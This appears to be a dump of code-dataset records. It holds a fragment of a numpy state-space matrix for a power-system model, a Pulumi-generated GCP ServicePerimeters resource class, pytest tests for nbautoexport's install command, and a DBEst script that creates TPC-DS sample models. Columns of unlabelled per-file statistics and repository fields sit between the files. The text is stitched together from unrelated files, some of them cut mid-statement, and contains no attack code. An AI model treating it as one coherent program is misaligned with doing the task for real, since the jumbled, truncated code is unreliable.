[gpr.Sn * npr.wn * (-i_dg * np.sin(delta) - i_qg * np.cos(delta)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0,
0, gpr.Sn * npr.wn * np.cos(delta) / (Csc * npr.Sb),
-gpr.Sn * npr.wn * np.sin(delta) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Csc, 0, 0, 0, 0, 0],
[gpr.Sn * npr.wn * (i_dg * np.cos(delta) - i_qg * np.sin(delta)) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0,
0, gpr.Sn * npr.wn * np.sin(delta) / (Csc * npr.Sb),
gpr.Sn * npr.wn * np.cos(delta) / (Csc * npr.Sb), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Csc, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Ccb, 0, -npr.wn / Ccb, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Ccb, 0, -npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb),
-npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (-Idw * np.sin(thetaw) - Iqw * np.cos(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn, 0, 0, 0, 0, npr.wn / Ccb,
0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * wf.Sn * np.sin(thetaw) / (Ccb * npr.Sb),
npr.wn * wf.Sn * np.cos(thetaw) / (Ccb * npr.Sb), 0, 0, 0, 0,
npr.wn * wf.Sn * (Idw * np.cos(thetaw) - Iqw * np.sin(thetaw)) / (Ccb * npr.Sb), 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, -npr.wn, 0, 0, 0, 0, 0, 0, npr.wn / Ccb],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, npr.wn / Ltsc, 0, -npr.wn / Ltsc, 0, 0, 0, 0, 0, -Rtsc * npr.wn / Ltsc, npr.wn,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Ltsc, 0, -npr.wn / Ltsc, 0, 0, 0, 0, -npr.wn, -Rtsc * npr.wn / Ltsc,
0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, 0, 0, -Rtwf * npr.wn / Ltwf,
npr.wn, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Ltwf, 0, 0, 0, -npr.wn / Ltwf, 0, 0, 0, 0, -npr.wn,
-Rtwf * npr.wn / Ltwf, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Lcb, 0, -npr.wn / Lcb, 0, 0, 0, 0, 0, -Rcb * npr.wn / Lcb,
npr.wn],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn / Lcb, 0, -npr.wn / Lcb, 0, 0, 0, 0, -npr.wn,
-Rcb * npr.wn / Lcb],
])
B = np.array([[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[npr.wn * wf.Kpc * wf.Kpp / wf.Lt, 0],
[0, -npr.wn * wf.Kpc * wf.Kpq * wf.Kq / wf.Lt],
[wf.Kpp, 0],
[0, -wf.Kpq * wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[1, 0],
[0, -wf.Kq],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
[0, 0],
])
C = np.zeros((2, 51))
D = np.array([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
Amat = A # -B@np.linalg.inv(D)@C
lambda_1, Phi_1 = np.linalg.eig(Amat)
lambda_1[np.where(abs(lambda_1) < 1e-7)] = 0
return lambda_1, Amat, A, B, C, D
| 58.482204
| 1,112
| 0.388073
| 25,212
| 152,814
| 2.290933
| 0.016579
| 0.229401
| 0.315899
| 0.391627
| 0.95457
| 0.937205
| 0.922575
| 0.911944
| 0.903721
| 0.897903
| 0
| 0.101304
| 0.418051
| 152,814
| 2,612
| 1,113
| 58.504594
| 0.548184
| 0.131539
| 0
| 0.687174
| 0
| 0
| 0.00335
| 0
| 0
| 0
| 0
| 0.001531
| 0
| 1
| 0.009906
| false
| 0
| 0.001043
| 0
| 0.020855
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
4a5c4305ac1abee7510d7ae4ee59202a7cdc5436
| 16,682
|
py
|
Python
|
sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/accesscontextmanager/service_perimeters.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServicePerimetersArgs', 'ServicePerimeters']
@pulumi.input_type
class ServicePerimetersArgs:
def __init__(__self__, *,
parent: pulumi.Input[str],
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]] = None):
"""
The set of arguments for constructing a ServicePerimeters resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
pulumi.set(__self__, "parent", parent)
if service_perimeters is not None:
pulumi.set(__self__, "service_perimeters", service_perimeters)
@property
@pulumi.getter
def parent(self) -> pulumi.Input[str]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: pulumi.Input[str]):
pulumi.set(self, "parent", value)
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
@service_perimeters.setter
def service_perimeters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]):
pulumi.set(self, "service_perimeters", value)
@pulumi.input_type
class _ServicePerimetersState:
def __init__(__self__, *,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]] = None):
"""
Input properties used for looking up and filtering ServicePerimeters resources.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
if parent is not None:
pulumi.set(__self__, "parent", parent)
if service_perimeters is not None:
pulumi.set(__self__, "service_perimeters", service_perimeters)
@property
@pulumi.getter
def parent(self) -> Optional[pulumi.Input[str]]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@parent.setter
def parent(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parent", value)
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
@service_perimeters.setter
def service_perimeters(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServicePerimetersServicePerimeterArgs']]]]):
pulumi.set(self, "service_perimeters", value)
class ServicePerimeters(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None,
__props__=None):
"""
Replace all existing Service Perimeters in an Access Policy with the Service Perimeters provided. This is done atomically.
This is a bulk edit of all Service Perimeters and may override existing Service Perimeters created by `accesscontextmanager.ServicePerimeter`,
thus causing a permadiff if used alongside `accesscontextmanager.ServicePerimeter` on the same parent.
To get more information about ServicePerimeters, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/accessPolicies.servicePerimeters)
* How-to Guides
* [Service Perimeter Quickstart](https://cloud.google.com/vpc-service-controls/docs/quickstart)
## Example Usage
### Access Context Manager Service Perimeters Basic
```python
import pulumi
import pulumi_gcp as gcp
access_policy = gcp.accesscontextmanager.AccessPolicy("access-policy",
parent="organizations/123456789",
title="my policy")
service_perimeter = gcp.accesscontextmanager.ServicePerimeters("service-perimeter",
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
service_perimeters=[
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["storage.googleapis.com"],
),
title="",
),
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["bigtable.googleapis.com"],
),
title="",
),
])
access_level = gcp.accesscontextmanager.AccessLevel("access-level",
basic=gcp.accesscontextmanager.AccessLevelBasicArgs(
conditions=[gcp.accesscontextmanager.AccessLevelBasicConditionArgs(
device_policy=gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyArgs(
os_constraints=[gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyOsConstraintArgs(
os_type="DESKTOP_CHROME_OS",
)],
require_screen_lock=False,
),
regions=[
"CH",
"IT",
"US",
],
)],
),
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
title="chromeos_no_lock")
```
## Import
ServicePerimeters can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}/servicePerimeters
```
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServicePerimetersArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Replace all existing Service Perimeters in an Access Policy with the Service Perimeters provided. This is done atomically.
This is a bulk edit of all Service Perimeters and may override existing Service Perimeters created by `accesscontextmanager.ServicePerimeter`,
thus causing a permadiff if used alongside `accesscontextmanager.ServicePerimeter` on the same parent.
To get more information about ServicePerimeters, see:
* [API documentation](https://cloud.google.com/access-context-manager/docs/reference/rest/v1/accessPolicies.servicePerimeters)
* How-to Guides
* [Service Perimeter Quickstart](https://cloud.google.com/vpc-service-controls/docs/quickstart)
## Example Usage
### Access Context Manager Service Perimeters Basic
```python
import pulumi
import pulumi_gcp as gcp
access_policy = gcp.accesscontextmanager.AccessPolicy("access-policy",
parent="organizations/123456789",
title="my policy")
service_perimeter = gcp.accesscontextmanager.ServicePerimeters("service-perimeter",
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
service_perimeters=[
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["storage.googleapis.com"],
),
title="",
),
gcp.accesscontextmanager.ServicePerimetersServicePerimeterArgs(
name=access_policy.name.apply(lambda name: f"accessPolicies/{name}/servicePerimeters/"),
status=gcp.accesscontextmanager.ServicePerimetersServicePerimeterStatusArgs(
restricted_services=["bigtable.googleapis.com"],
),
title="",
),
])
access_level = gcp.accesscontextmanager.AccessLevel("access-level",
basic=gcp.accesscontextmanager.AccessLevelBasicArgs(
conditions=[gcp.accesscontextmanager.AccessLevelBasicConditionArgs(
device_policy=gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyArgs(
os_constraints=[gcp.accesscontextmanager.AccessLevelBasicConditionDevicePolicyOsConstraintArgs(
os_type="DESKTOP_CHROME_OS",
)],
require_screen_lock=False,
),
regions=[
"CH",
"IT",
"US",
],
)],
),
parent=access_policy.name.apply(lambda name: f"accessPolicies/{name}"),
title="chromeos_no_lock")
```
## Import
ServicePerimeters can be imported using any of these accepted formats
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}/servicePerimeters
```
```sh
$ pulumi import gcp:accesscontextmanager/servicePerimeters:ServicePerimeters default {{parent}}
```
:param str resource_name: The name of the resource.
:param ServicePerimetersArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServicePerimetersArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServicePerimetersArgs.__new__(ServicePerimetersArgs)
if parent is None and not opts.urn:
raise TypeError("Missing required property 'parent'")
__props__.__dict__["parent"] = parent
__props__.__dict__["service_perimeters"] = service_perimeters
super(ServicePerimeters, __self__).__init__(
'gcp:accesscontextmanager/servicePerimeters:ServicePerimeters',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
parent: Optional[pulumi.Input[str]] = None,
service_perimeters: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]]] = None) -> 'ServicePerimeters':
"""
Get an existing ServicePerimeters resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] parent: The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServicePerimetersServicePerimeterArgs']]]] service_perimeters: The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServicePerimetersState.__new__(_ServicePerimetersState)
__props__.__dict__["parent"] = parent
__props__.__dict__["service_perimeters"] = service_perimeters
return ServicePerimeters(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def parent(self) -> pulumi.Output[str]:
"""
The AccessPolicy this ServicePerimeter lives in.
Format: accessPolicies/{policy_id}
"""
return pulumi.get(self, "parent")
@property
@pulumi.getter(name="servicePerimeters")
def service_perimeters(self) -> pulumi.Output[Optional[Sequence['outputs.ServicePerimetersServicePerimeter']]]:
"""
The desired Service Perimeters that should replace all existing Service Perimeters in the Access Policy.
Structure is documented below.
"""
return pulumi.get(self, "service_perimeters")
| 47.936782
| 235
| 0.654058
| 1,531
| 16,682
| 6.949053
| 0.150229
| 0.09108
| 0.019739
| 0.030548
| 0.820848
| 0.807031
| 0.806185
| 0.795094
| 0.7903
| 0.78419
| 0
| 0.001702
| 0.260221
| 16,682
| 347
| 236
| 48.074928
| 0.860384
| 0.54364
| 0
| 0.559322
| 1
| 0
| 0.153634
| 0.073816
| 0
| 0
| 0
| 0
| 0
| 1
| 0.144068
| false
| 0.008475
| 0.059322
| 0
| 0.288136
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4a837390ce0ca5bc474bb50477fbcfd22817d7a5
| 2,191
|
py
|
Python
|
tests/test_cli_install.py
|
drivendataorg/nbautoexport
|
3a3d67ac392d22bd2284ccce98f70ca76fd01637
|
[
"MIT"
] | 46
|
2020-07-25T22:59:56.000Z
|
2022-03-11T00:06:30.000Z
|
tests/test_cli_install.py
|
drivendataorg/nbautoexport
|
3a3d67ac392d22bd2284ccce98f70ca76fd01637
|
[
"MIT"
] | 67
|
2020-07-01T18:55:20.000Z
|
2022-03-16T20:20:27.000Z
|
tests/test_cli_install.py
|
drivendataorg/nbautoexport
|
3a3d67ac392d22bd2284ccce98f70ca76fd01637
|
[
"MIT"
] | 7
|
2020-07-21T05:36:21.000Z
|
2021-10-03T21:02:33.000Z
|
from typer.testing import CliRunner
from nbautoexport.nbautoexport import app
from nbautoexport import jupyter_config
def test_install_new_config(tmp_path, monkeypatch):
monkeypatch.setenv("JUPYTER_CONFIG_DIR", str(tmp_path))
config_path = tmp_path / "jupyter_notebook_config.py"
result = CliRunner().invoke(app, ["install"])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == jupyter_config.post_save_hook_initialize_block
def test_install_existing_config(tmp_path, monkeypatch):
monkeypatch.setenv("JUPYTER_CONFIG_DIR", str(tmp_path))
config_path = tmp_path / "jupyter_notebook_config.py"
with config_path.open("w", encoding="utf-8") as fp:
fp.write("print('hello world!')")
assert config_path.exists()
result = CliRunner().invoke(app, ["install"])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == (
"print('hello world!')" + "\n" + jupyter_config.post_save_hook_initialize_block
)
def test_install_new_config_with_path(tmp_path):
config_path = tmp_path / "nonstandard_config.py"
result = CliRunner().invoke(app, ["install", "--jupyter-config", str(config_path)])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == jupyter_config.post_save_hook_initialize_block
def test_install_existing_config_with_path(tmp_path):
config_path = tmp_path / "nonstandard_config.py"
with config_path.open("w", encoding="utf-8") as fp:
fp.write("print('hello world!')")
assert config_path.exists()
result = CliRunner().invoke(app, ["install", "--jupyter-config", str(config_path)])
assert result.exit_code == 0
assert config_path.exists()
with config_path.open("r", encoding="utf-8") as fp:
config = fp.read()
assert config == (
"print('hello world!')" + "\n" + jupyter_config.post_save_hook_initialize_block
)
| 31.753623
| 87
| 0.69466
| 295
| 2,191
| 4.891525
| 0.169492
| 0.12474
| 0.045738
| 0.091476
| 0.928621
| 0.914761
| 0.914761
| 0.914761
| 0.914761
| 0.914761
| 0
| 0.005531
| 0.174806
| 2,191
| 68
| 88
| 32.220588
| 0.792589
| 0
| 0
| 0.808511
| 0
| 0
| 0.143314
| 0.042903
| 0
| 0
| 0
| 0
| 0.297872
| 1
| 0.085106
| false
| 0
| 0.06383
| 0
| 0.148936
| 0.085106
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4abaeb27a368ef505c2af8ba0f4e1b60813635b4
| 38,284
|
py
|
Python
|
experiments/tpcds1d.py
|
qingzma/DBEstClient
|
d2cdf51bc3c69e50bcf4d1d516673b7d20843c16
|
[
"BSD-2-Clause"
] | 11
|
2019-12-24T02:39:35.000Z
|
2022-03-21T22:39:41.000Z
|
experiments/tpcds1d.py
|
Forever-MrX/DBEstClient
|
d2cdf51bc3c69e50bcf4d1d516673b7d20843c16
|
[
"BSD-2-Clause"
] | 4
|
2019-12-09T09:48:17.000Z
|
2021-07-07T02:58:26.000Z
|
experiments/tpcds1d.py
|
qingzma/DBEstClient
|
d2cdf51bc3c69e50bcf4d1d516673b7d20843c16
|
[
"BSD-2-Clause"
] | 8
|
2019-11-08T02:10:37.000Z
|
2022-03-21T22:42:46.000Z
|
# Created by Qingzhi Ma at 21/11/2019
# All right reserved
# Department of Computer Science
# the University of Warwick
# Q.Ma.2@warwick.ac.uk
from dbestclient.executor.executor import SqlExecutor
def run():
#
sqlExecutor = SqlExecutor()
sqlExecutor.set_table_headers("ss_sold_date_sk,ss_sold_time_sk,ss_item_sk,ss_customer_sk,ss_cdemo_sk,ss_hdemo_sk," +
"ss_addr_sk,ss_store_sk,ss_promo_sk,ss_ticket_number,ss_quantity,ss_wholesale_cost," +
"ss_list_price,ss_sales_price,ss_ext_discount_amt,ss_ext_sales_price," +
"ss_ext_wholesale_cost,ss_ext_list_price,ss_ext_tax,ss_coupon_amt,ss_net_paid," +
"ss_net_paid_inc_tax,ss_net_profit,none")
# build_models(sqlExecutor)
run_10k(sqlExecutor)
run_100k(sqlExecutor)
# sqlExecutor.execute(
# "create table tpcds40g_storesales_10k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 50.00 and 100.00")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 100.00 and 150.00")
# sqlExecutor.execute("select sum(ss_quantity) from tpcds40g_storesales_10k_ss_quantity_ss_sales_price_ where ss_sales_price between 150.00 and 200.00")
def build_models(sqlExecutor):
# 10k
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_quantity_ss_sales_price(ss_quantity real, ss_sales_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_quantity_ss_net_profit(ss_quantity real, ss_net_profit real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_quantity(ss_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_list_price(ss_list_price real, ss_list_price real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_coupon_amt(ss_list_price real, ss_coupon_amt real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_list_price_ss_wholesale_cost(ss_list_price real, ss_wholesale_cost real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_discount_amt_ss_quantity(ss_ext_discount_amt real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_sales_price_ss_quantity(ss_ext_sales_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_list_price_ss_quantity(ss_ext_list_price real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_ext_tax_ss_quantity(ss_ext_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_paid_ss_quantity(ss_net_paid real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_paid_inc_tax_ss_quantity(ss_net_paid_inc_tax real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.execute(
"create table tpcds40g_storesales_10k_ss_net_profit_ss_quantity(ss_net_profit real, ss_quantity real) from '/data/tpcds/40G/store_sales.dat' method uniform size 10000")
sqlExecutor.set_table_headers(
"ws_sold_date_sk,ws_sold_time_sk,ws_ship_date_sk,ws_item_sk,ws_bill_customer_sk,ws_bill_cdemo_sk," +
"ws_bill_hdemo_sk,ws_bill_addr_sk,ws_ship_customer_sk,ws_ship_cdemo_sk,ws_ship_hdemo_sk,ws_ship_addr_sk," +
"ws_web_page_sk,ws_web_site_sk,ws_ship_mode_sk,ws_warehouse_sk,ws_promo_sk,ws_order_number,ws_quantity," +
